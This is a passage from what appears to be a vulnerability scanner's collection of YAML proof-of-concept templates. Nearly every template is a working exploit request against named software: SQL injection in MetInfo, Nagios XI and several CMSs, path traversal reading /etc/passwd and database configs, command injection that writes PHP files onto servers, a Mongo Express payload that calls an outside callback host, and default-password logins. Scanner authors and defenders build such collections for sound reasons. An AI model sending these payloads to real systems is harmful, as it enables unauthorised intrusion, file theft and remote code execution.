links: 14 | - https://www.cnblogs.com/jinqi520/p/11596500.html 15 | - https://www.t00ls.net/thread-53291-1-1.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-cve-2019-16996-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-16996-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,{{r1}}*{{r2}},5,6,7%20limit%205,1%20%23 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: JingLing(https://hackfun.org/) 14 | metinfo_version: 7.0.0beta 15 | links: 16 | - https://y4er.com/post/metinfo7-sql-tips/#sql-injection-1 -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-cve-2019-16997-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-16997-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /admin/?n=language&c=language_general&a=doExportPack 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: 'appno= 1 union SELECT {{r1}}*{{r2}},1&editor=cn&site=web' 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 14 | detail: 15 | author: JingLing(https://hackfun.org/) 16 | metinfo_version: 7.0.0beta 17 | links: 18 | - https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2 -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-cve-2019-17418-sqli.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-metinfo-cve-2019-17418-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+{{r1}}*{{r2}},1--+&site=admin 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: JingLing(https://hackfun.org/) 14 | metinfo_version: 7.0.0beta 15 | links: 16 | - https://github.com/evi1code/Just-for-fun/issues/2 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-file-read 2 | rules: 3 | - method: GET 4 | path: "/include/thumb.php?dir=http/.....///.....///config/config_db.php" 5 | expression: response.status == 200 && response.body.bcontains(b"con_db_pass") && response.body.bcontains(b"con_db_host") && response.body.bcontains(b"con_db_name") 6 | detail: 7 | author: amos1 8 | links: 9 | - https://www.cnblogs.com/-qing-/p/10889467.html 10 | -------------------------------------------------------------------------------- /src/plugins/pocs/metinfo-lfi-cnvd-2018-13393.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-lfi-cnvd-2018-13393 2 | rules: 3 | - method: GET 4 | path: /include/thumb.php?dir=http\..\admin\login\login_check.php 5 | follow_redirects: true 6 | expression: | 7 | response.body.bcontains(b"- 11 | document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}') 12 | follow_redirects: true 13 | expression: > 14 | reverse.wait(5) 15 | detail: 16 | vulnpath: '/checkValid' 17 | author: fnmsd(https://github.com/fnmsd) 18 | description: 'Mongo Express CVE-2019-10758 Code Execution' 19 | links: 20 | - 
https://github.com/masahiro331/CVE-2019-10758 21 | - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html -------------------------------------------------------------------------------- /src/plugins/pocs/mpsec-isg1000-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-mpsec-isg1000-file-read 2 | rules: 3 | - method: GET 4 | path: /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd 5 | expression: | 6 | response.status == 200 && response.content_type.contains("text/plain") && response.headers["set-cookie"].contains("USGSESSID=") && "root:[x*]?:0:0:".bmatches(response.body) 7 | detail: 8 | author: YekkoY 9 | description: "迈普 ISG1000安全网关 任意文件下载漏洞" 10 | links: 11 | - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E8%BF%88%E6%99%AE/%E8%BF%88%E6%99%AE%20ISG1000%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.html?h=isg1000 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/msvod-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-msvod-sqli 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: "/images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5({{r1}}))) desc --+a" 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: jinqi 11 | links: 12 | - https://github.com/jinqi520 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/myucms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-myucms-lfr 2 | rules: 3 | - method: GET 4 | path: /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 5 | expression: | 6 | response.status 
== 200 && "root:[x*]:0:0:".bmatches(response.body) 7 | detail: 8 | author: jinqi 9 | links: 10 | - https://github.com/jinqi520 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/nagio-cve-2018-10735.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10735 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{r}}))%23 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | author: 0x_zmz(github.com/0x-zmz) 12 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 13 | links: 14 | - https://www.seebug.org/vuldb/ssvid-97265 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/nagio-cve-2018-10736.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10736 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{r}}))%23 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | author: 0x_zmz(github.com/0x-zmz) 12 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 13 | links: 14 | - https://www.seebug.org/vuldb/ssvid-97266 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/nagio-cve-2018-10737.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10737 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: 
/nagiosql/admin/logbook.php 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: 10 | txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(r)))) 14 | detail: 15 | author: 0x_zmz(github.com/0x-zmz) 16 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 17 | links: 18 | - https://www.seebug.org/vuldb/ssvid-97267 19 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10737 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/nagio-cve-2018-10738.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10738 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /nagiosql/admin/menuaccess.php 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: 10 | selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(r)))) 14 | detail: 15 | author: 0x_zmz(github.com/0x-zmz) 16 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 17 | links: 18 | - https://www.seebug.org/vuldb/ssvid-97268 19 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10738 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/natshell-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-natshell-arbitrary-file-read 2 | rules: 3 | - method: GET 4 | path: 
/download.php?file=../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "(root|toor):[x*]:0:0:".bmatches(response.body) 8 | 9 | detail: 10 | author: Print1n(http://print1n.top) 11 | links: 12 | - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/netentsec-icg-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-netentsec-icg-default-password 2 | rules: 3 | - method: POST 4 | path: /user/login/checkPermit 5 | body: usrname=ns25000&pass=ns25000 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"\"agreed\":true") 8 | detail: 9 | author: B1anda0(https://github.com/B1anda0) 10 | links: 11 | - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603 -------------------------------------------------------------------------------- /src/plugins/pocs/netentsec-ngfw-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-netentsec-ngfw-rce 2 | set: 3 | r2: randomLowercase(10) 4 | rules: 5 | - method: POST 6 | path: /directdata/direct/router 7 | body: | 8 | {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '' >/var/www/html/{{r2}}.php"]}],"type":"rpc","tid":17} 9 | expression: | 10 | response.status == 200 && response.body.bcontains(b"SSLVPN_Resource") && response.body.bcontains(b"\"result\":{\"success\":true}") 11 | - method: GET 12 | path: /{{r2}}.php 13 | expression: | 14 | response.status == 200 && response.body.bcontains(bytes(md5(r2))) 15 | detail: 16 | author: YekkoY 17 | description: "网康下一代防火墙_任意命令执行漏洞" 18 | links: 19 | - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/netgear-cve-2017-5521.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-netgear-cve-2017-5521 2 | rules: 3 | - method: POST 4 | path: /passwordrecovered.cgi?id=get_rekt 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "right\">Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left") 8 | detail: 9 | author: betta(https://github.com/betta-cyber) 10 | links: 11 | - https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/nextjs-cve-2017-16877.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nextjs-cve-2017-16877 2 | rules: 3 | - method: GET 4 | path: /_next/../../../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | version: <2.4.1 10 | author: Loneyer 11 | links: 12 | - https://github.com/Loneyers/vuldocker/tree/master/next.js 13 | - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/nexus-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexus-default-password 2 | rules: 3 | - method: GET 4 | path: /service/local/authentication/login 5 | follow_redirects: false 6 | headers: 7 | Accept: application/json 8 | Authorization: Basic YWRtaW46YWRtaW4xMjM= 9 | expression: > 10 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"loggedIn") 11 | detail: 12 | author: Soveless(https://github.com/Soveless) 13 | Affected Version: "Nexus Repository Manager OSS" 14 | links: 15 | - 
https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/nexusdb-cve-2020-24571-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexusdb-cve-2020-24571-path-traversal 2 | rules: 3 | - method: GET 4 | path: /../../../../../../../../windows/win.ini 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(bytes("[extensions]")) && response.content_type.contains("application/octet-stream") 8 | detail: 9 | author: su(https://suzzz112113.github.io/#blog) 10 | links: 11 | - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 -------------------------------------------------------------------------------- /src/plugins/pocs/nhttpd-cve-2019-16278.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nhttpd-cve-2019-16278 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0" 8 | body: | 9 | echo 10 | echo 11 | expr {{r1}} + {{r2}} 2>&1 12 | expression: > 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 14 | 15 | detail: 16 | author: Loneyer 17 | versions: <= 1.9.6 18 | links: 19 | - https://git.sp0re.sh/sp0re/Nhttpd-exploits 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/node-red-dashboard-file-read-cve-2021-3223.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-node-red-dashboard-file-read-cve-2021-3223 2 | rules: 3 | - method: GET 4 | path: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js 5 | expression: | 6 | response.status == 200 && 
response.body.bcontains(bytes("Node-RED web server is listening")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password")) 7 | detail: 8 | author: Print1n(http://print1n.top) 9 | links: 10 | - https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/novnc-url-redirection-cve-2021-3654.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-novnc-url-redirection-cve-2021-3654 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"noVNC") 8 | - method: GET 9 | path: "//baidu.com/%2f.." 10 | follow_redirects: false 11 | expression: | 12 | response.status == 301 && response.headers["location"] == "//baidu.com/%2f../" 13 | detail: 14 | author: txf(https://github.com/tangxiaofeng7) 15 | links: 16 | - https://seclists.org/oss-sec/2021/q3/188 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/nps-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nps-default-password 2 | rules: 3 | - method: POST 4 | path: /login/verify 5 | body: username=admin&password=123 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"login success") 9 | -------------------------------------------------------------------------------- /src/plugins/pocs/ns-asg-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ns-asg-file-read 2 | rules: 3 | - method: GET 4 | path: "/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"$certfile") && 
response.body.bcontains(b"application/pdf") 7 | detail: 8 | author: YekkoY 9 | description: "网康 NS-ASG安全网关 任意文件读取漏洞" 10 | links: 11 | - http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md -------------------------------------------------------------------------------- /src/plugins/pocs/nsfocus-uts-password-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nsfocus-uts-password-leak 2 | rules: 3 | - method: GET 4 | path: /webapi/v1/system/accountmanage/account 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"account") && response.body.bcontains(b"password") 8 | detail: 9 | author: MrP01ntSun(https://github.com/MrPointSun) 10 | links: 11 | - https://blog.csdn.net/DFMASTER/article/details/108547352 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/nuuo-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nuuo-file-inclusion 2 | rules: 3 | - method: GET 4 | path: /css_parser.php?css=css_parser.php 5 | follow_redirects: false 6 | expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']") 7 | detail: 8 | author: 2357000166(https://github.com/2357000166) 9 | links: 10 | - https://www.exploit-db.com/exploits/40211 -------------------------------------------------------------------------------- /src/plugins/pocs/odoo-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-odoo-file-read 2 | groups: 3 | win: 4 | - method: GET 5 | path: "/base_import/static/c:/windows/win.ini" 6 | 
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 7 | linux: 8 | - method: GET 9 | path: "/base_import/static/etc/passwd" 10 | expression: response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body) 11 | detail: 12 | author: amos1 13 | links: 14 | - https://quake.360.cn/quake/#/vulDetail/QH-202006-1954/checked 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/openfire-cve-2019-18394-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-openfire-cve-2019-18394-ssrf 2 | rules: 3 | - method: GET 4 | path: /getFavicon?host=baidu.com/? 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com")) 8 | detail: 9 | author: su(https://suzzz112113.github.io/#blog) 10 | links: 11 | - https://www.cnvd.org.cn/patchInfo/show/192993 12 | - https://www.cnblogs.com/potatsoSec/p/13437713.html 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/panabit-gateway-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-gateway-default-password 2 | rules: 3 | - method: POST 4 | path: /login/userverify.cgi 5 | body: username=admin&password=panabit 6 | expression: | 7 | response.status == 200 && response.headers["Set-Cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm") 8 | detail: 9 | author: Print1n(https://github.com/Print1n) 10 | links: 11 | - https://max.book118.com/html/2017/0623/117514590.shtm -------------------------------------------------------------------------------- /src/plugins/pocs/panabit-ixcache-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-ixcache-default-password 2 | rules: 3 | 
- method: POST 4 | path: /login/userverify.cgi 5 | body: username=admin&password=ixcache 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi") 8 | detail: 9 | author: B1anda0(https://github.com/B1anda0) 10 | links: 11 | - http://forum.panabit.com/thread-10830-1-1.html -------------------------------------------------------------------------------- /src/plugins/pocs/pbootcms-database-file-download.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pbootcms-database-file-download 2 | rules: 3 | - method: GET 4 | path: /data/pbootcms.db 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "^SQLite format 3\\x00\\x10".bmatches(response.body) && response.body.bcontains(b"PbootCMS") 8 | detail: 9 | author: abcRosexyz(https://github.com/abcRosexyz) 10 | links: 11 | - https://www.cnblogs.com/0daybug/p/12786036.html 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/php-cgi-cve-2012-1823.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-php-cgi-cve-2012-1823 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: POST 6 | path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 7 | body: 8 | follow_redirects: false 9 | expression: | 10 | response.body.bcontains(bytes(md5(string(rand)))) 11 | detail: 12 | author: 17bdw 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 -------------------------------------------------------------------------------- /src/plugins/pocs/phpcms-cve-2018-19127.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpcms-cve-2018-19127 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss 
7 | follow_redirects: true 8 | expression: | 9 | response.status == 200 10 | - method: GET 11 | path: /data/cache_template/rss.tpl.php?1={{r}} 12 | follow_redirects: true 13 | expression: | 14 | response.body.bcontains(bytes(md5(string(r)))) 15 | 16 | detail: 17 | author: pa55w0rd(www.pa55w0rd.online/) 18 | Affected Version: "PHPCMS2008" 19 | links: 20 | - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion 2 | rules: 3 | - method: GET 4 | path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: >- 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: p0wd3r 10 | links: 11 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpmyadmin-setup-deserialization.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-setup-deserialization 2 | rules: 3 | - method: POST 4 | path: /scripts/setup.php 5 | body: >- 6 | action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} 7 | follow_redirects: false 8 | expression: >- 9 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 10 | detail: 11 | author: p0wd3r 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpok-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpok-sqli 2 | set: 3 | r1: randomInt(800000000, 
1000000000) 4 | rules: 5 | - method: GET 6 | path: "/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{r1}}))) --+" 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: jinqi 11 | links: 12 | - https://github.com/jinqi520 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpshe-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpshe-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5({{rand}})%29,4,5,6,7,8,9,10,11,12%23_ 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: hhdaddy 11 | Affected Version: "1.7" 12 | links: 13 | - https://www.cnblogs.com/Spec/p/10718046.html 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/phpstudy-backdoor-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpstudy-backdoor-rce 2 | set: 3 | r: randomLowercase(6) 4 | payload: base64("printf(md5('" + r + "'));") 5 | rules: 6 | - method: GET 7 | path: /index.php 8 | headers: 9 | Accept-Encoding: 'gzip,deflate' 10 | Accept-Charset: '{{payload}}' 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(r))) 14 | detail: 15 | author: 17bdw 16 | Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4" 17 | vuln_url: "php_xmlrpc.dll" 18 | links: 19 | - https://www.freebuf.com/column/214946.html -------------------------------------------------------------------------------- /src/plugins/pocs/phpunit-cve-2017-9841-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpunit-cve-2017-9841-rce 2 | set: 3 
| rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 7 | body: 8 | follow_redirects: false 9 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 10 | detail: 11 | author: p0wd3r,buchixifan 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841 -------------------------------------------------------------------------------- /src/plugins/pocs/prometheus-url-redirection-cve-2021-29622.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-prometheus-url-redirection-cve-2021-29622 2 | rules: 3 | - method: GET 4 | path: /new/newhttps:/baidu.com 5 | follow_redirects: false 6 | expression: | 7 | response.status == 302 && response.headers["location"] == "https:/baidu.com?" 8 | detail: 9 | author: fuzz7j(https://github.com/fuzz7j) 10 | links: 11 | - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/pulse-cve-2019-11510.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pulse-cve-2019-11510 2 | rules: 3 | - method: GET 4 | path: >- 5 | /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | detail: 10 | author: leezp 11 | Affected Version: "Pulse Connect Secure: 9.0RX 8.3RX 8.2RX" 12 | links: 13 | - https://github.com/jas502n/CVE-2019-11510-1 14 | - https://github.com/projectzeroindia/CVE-2019-11510 -------------------------------------------------------------------------------- /src/plugins/pocs/qibocms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qibocms-sqli 2 | set: 3 | 
rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5({{rand}}),9,10,11,12,13,14,15,16,17,18,19%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | links: 12 | - https://www.ld-fcw.com/ 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/qilin-bastion-host-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qilin-bastion-host-rce 2 | set: 3 | r2: randomLowercase(10) 4 | rules: 5 | - method: GET 6 | path: /get_luser_by_sshport.php?clientip=1;echo%20"">/opt/freesvr/web/htdocs/freesvr/audit/{{r2}}.php;&clientport=1 7 | follow_redirects: false 8 | expression: response.status == 200 9 | 10 | - method: GET 11 | path: /{{r2}}.php 12 | follow_redirects: false 13 | expression: response.status == 200 && response.body.bcontains(bytes(md5(r2))) 14 | 15 | detail: 16 | author: For3stCo1d (https://github.com/For3stCo1d) 17 | description: "iAudit-fortressaircraft-rce" 18 | links: 19 | - https://yun.scdsjzx.cn/system/notice/detail/399d2dd0-94aa-4914-a8f6-e71f8dc8ac87 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/qizhi-fortressaircraft-unauthorized.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qizhi-fortressaircraft-unauthorized 2 | rules: 3 | - method: GET 4 | path: >- 5 | /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计") 8 | 9 | detail: 10 | author: we1x4n(https://we1x4n.com/) 11 
| links: 12 | - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/rabbitmq-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rabbitmq-default-password 2 | rules: 3 | - method: GET 4 | path: /api/whoami 5 | expression: | 6 | response.status == 401 7 | - method: GET 8 | path: /api/whoami 9 | headers: 10 | Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"\"name\":\"guest\"") 13 | detail: 14 | author: mumu0215(https://github.com/mumu0215) 15 | links: 16 | - http://luckyzmj.cn/posts/15dff4d3.html -------------------------------------------------------------------------------- /src/plugins/pocs/rails-cve-2018-3760-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rails-cve-2018-3760-rce 2 | rules: 3 | - method: GET 4 | path: '/assets/file:%2f%2f/etc/passwd' 5 | follow_redirects: false 6 | expression: | 7 | response.status == 500 && response.body.bcontains(b"FileOutsidePaths") 8 | search: '/etc/passwd is no 